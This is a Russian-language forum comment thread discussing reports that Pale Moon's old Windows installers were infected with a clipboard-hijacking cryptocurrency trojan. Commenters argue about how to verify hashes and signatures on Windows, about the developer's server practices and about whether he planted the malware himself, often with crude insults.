С каких пор озвучивание очевидного является троллингом? Да ещё и не худеньким, странно...
> проблема затрагивает только старые Windows-версииТак винда сама по себе это сборник проблем, одной больше, одной меньше, разницы нет!
Учитывая, что чувачок очень мутный он мог и сам вставить зловредов, что бы поиметь лохов, которые ему верят. А вы не доверяйте подобным чувачкам, которые воруют чужой код, удаляют все что не могут понять и говорят о том, что они делают лучше и безопасней.
Батя твой мутный, делай выводы. Зачем вообще разрабам внедрять зловред в архивы браузера, если ими никто не пользуется?
И теперь после этой новости думай, стоило ли ставить Firefox или Pale moon для Windows на работе. (Хорошо что остались на Firefox.)
> Хорошо что остались на FirefoxА чем SeaMonkey не удовлетворяет?
> А чем SeaMonkey не удовлетворяет?У нас был Firefox и только Firefox. Про SeaMonkey там никто не знает. (Да и не желают ничего другого.)
> Изменения в установщике могли быть выявлены пользователем при проверке прилагаемых к файлам цифровых подписей или хэшей SHA256.Вот и ответ. Всего-то.
Но никто не проверял. Возможно, просто потому, что никто не устанавливал. :D (да и userbase не такой уж масштабный). А возможно, потому что на винде даже хеши посчитать чуть сложнее. Надо приблуды какие-нибудь ставить.
>Надо приблуды какие-нибудь ставить.7zip. В контекстном меню появится "CRC SHA >" подменю.
7z не ставится в Windows по дефолту. :D
А если файл exe закатать в zip то explorer при открытии zip в свойствах файла exe покажет его суммы.
> А если файл exe закатать в zip то explorer при открытии zip в свойствах файла exe покажет его суммы.SHA суммы? Или только CRC/Adler?
>7zip. В контекстном меню появится "CRC SHA >" подменю.очень неудобная хрень
даже скопировать хэш нельзя
> А возможно, потому что на винде даже хеши посчитать чуть сложнее. Надо приблуды какие-нибудь ставить.Ничем не отличается от Linux/macOS
"sha256sum" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.точно не отличается?
другое дело что смысл сравнивать хэши скачанные с того же ftp сервера что и архив как-то не очень просматривается - ну вот разьве что в надежде на лень горе-хакера. Небось и скрипт пересчета где-нибудь там же лежал.
> точно не отличается?Ну естественно синтаксис другой :D
В Windows есть две команды для вычисления одна из cmd.exe, другая из PowerShell.А для гуёв так же надо что-то ставить, как и в линуксах. В той же дефолтной Ubuntu c Gnome какой-то там пакет типа nautilus-hash.
> В той же дефолтной Ubuntu c Gnome какой-то там пакет типа
> nautilus-hash.у меня, понятно, нет десктопа на убунте, но помнится, там достаточно было мышом потыкать в такой файлик. в венде все это, мягко говоря, криво. Я вот про certutil даже и не вспомнил. А у типового юзверя нет 7zip.
да и привык он все же надеяться на подписи, с которыми шерстяной то ли не справился, то ли не доплатил.
> но помнится, там достаточно было мышом потыкать в такой файлик.нет. Пока пакет выше не поставишь - такого не будет
Пользуйтесь КДЕ, и все будет сразу и по умолчанию.
Ничего не надо ставить - цифровые подписи давно встроенны как в инсталятор, так и в непосредственно запускаемые файлы
Но это только у нормальных программ так, осилили ли разработчики подделки Файрфокса - я не знаю
> Но это только у нормальных программ так, осилили ли разработчики подделки Файрфокса - я не знаюкриво осилили.
Во всяком случае, когда я последний раз проверял - все было так же - архив подписан, исполняемый файл подписан, а вот запускаемый из архива установщик (installshield ниасилен, он же ж денег стоит) - нихрена, при том что он-то и исполняется с повышенными правами.
а разобраться что раньше сперва спрашивало по имени разработчика, и лишь потом вылезало безадресное окно, а теперь сразу непойми от кого запускается - это ты разьве что уже после предупреждения что оно зараженное сумеешь.
ОСь сменили, поставит сервер у себя дома и можно дальше пользоваться pale moon'ом. Надежней вариантов все равно нет.
> троянским ПО Win32/ClipBanker.DY, нацеленным на кражу криптовалюты через подмену bitcoin-адресов в буфере обменаТоесть всем строго пофиг?
на кражи биткойнов-то? Конечно.Интересно, повезло автору хоть один-то стырить?
Найди адрес да проверь
>Во время взлома сервер работал по управлением Windows и был запущен в виртуальной машине, арендованной у оператора Frantech/BuyVMофигеть. ну это всё, что нужно было знать, в общем-то
>выборочно инфицировали все exe-файлыТак выборочно или все?
Инфицировал только exe-файлы (но все), остальные не инфицировал, так что выборочно.
Дададад! Выборочно все! Рандомно-поголовно!1
Если предположить, что они сами этот троян и добавили, становится понятно, почему они так усердно борятся с посторонними сборками Pale Moon.
https://github.com/jasperla/openbsd-wip/issues/86
> Во время взлома сервер работал по управлением WindowsИз уважаемых коллег никто не отметил, что выставленный в Интернет сервер Windows - это уже диагноз, свидетельствующий о своеобразной компетенции разработчика?
Стандартный баг малых проектов. Не обновляемый сервер под линем та же хренота и разносчик спама.
Казалось бы, почему автор запрещает распространять сторонние сборки. А вот оказывается почему.
Да уж, PaleMoon то еще дно. Скачивал якобы "оптимизированную" сборку для процов Atom... В итоге все работало еще хуже, чем на огнелисе... PaleMoon НИНУЖИН
В одной из статей, я написал, что это днище не дает даже по HTTPS скачать бинарь. Как вы калечи можете рекомендовать его как безопасный браузер?На что меня тупо заминусили. Я подумал "дятлы" и естественно обошел стороной проект, который не может решить даже инфраструктурные проблемы.
> На что меня тупо заминусили. Я подумал "дятлы"не тупо. Сам ты дятел.
_http_://archive.debian.org/ передает тебе привет, и предлагает подумать, если есть чем, стоит ли тратить ресурсы сервера на ненужношифрование, когда оно действительно - ненужно.то что у шерстяного какие-то глубокие внутриголовные проблемы с подписями (и сама-то подпись куплена у какого-то даже не третьесортного CA) - это отдельная печальная история, как и то что модные антивирусы видят вирусы там, где их нет, и не видят там, где вполне себе есть (видимо, все усилия потрачены авторами на воровство секретных документов)
>> На что меня тупо заминусили. Я подумал "дятлы"
> не тупо. Сам ты дятел.
> _http_://archive.debian.org/ передает тебе привет, и предлагает подумать, если есть чем,
> стоит ли тратить ресурсы сервера на ненужношифрование, когда оно действительно -
> ненужно.
> то что у шерстяного какие-то глубокие внутриголовные проблемы с подписями (и сама-то
> подпись куплена у какого-то даже не третьесортного CA) - это отдельная
> печальная история, как и то что модные антивирусы видят вирусы там,
> где их нет, и не видят там, где вполне себе есть
> (видимо, все усилия потрачены авторами на воровство секретных документов)а deb пакеты не подписываются?
плеать лучше убейся...
Хватит уже копья ломать. Кто-то просто потренировался во взломе. А что заметили (чисто случайно) через 1.5 года. Так эти ископаемые известной степени работоспособности (20.х) даже самому автору были особо не нужны: кинул в чулан, и пускай лежат, есть всё-равно не просят.
Интересно, зачем взламывать сервер какого-то шерстяного браузера, которым и пользуется 3,5 человека?! Нет чтобы гугла завалить... Или, на худой конец, ежа. И вони было бы гораздо больше!
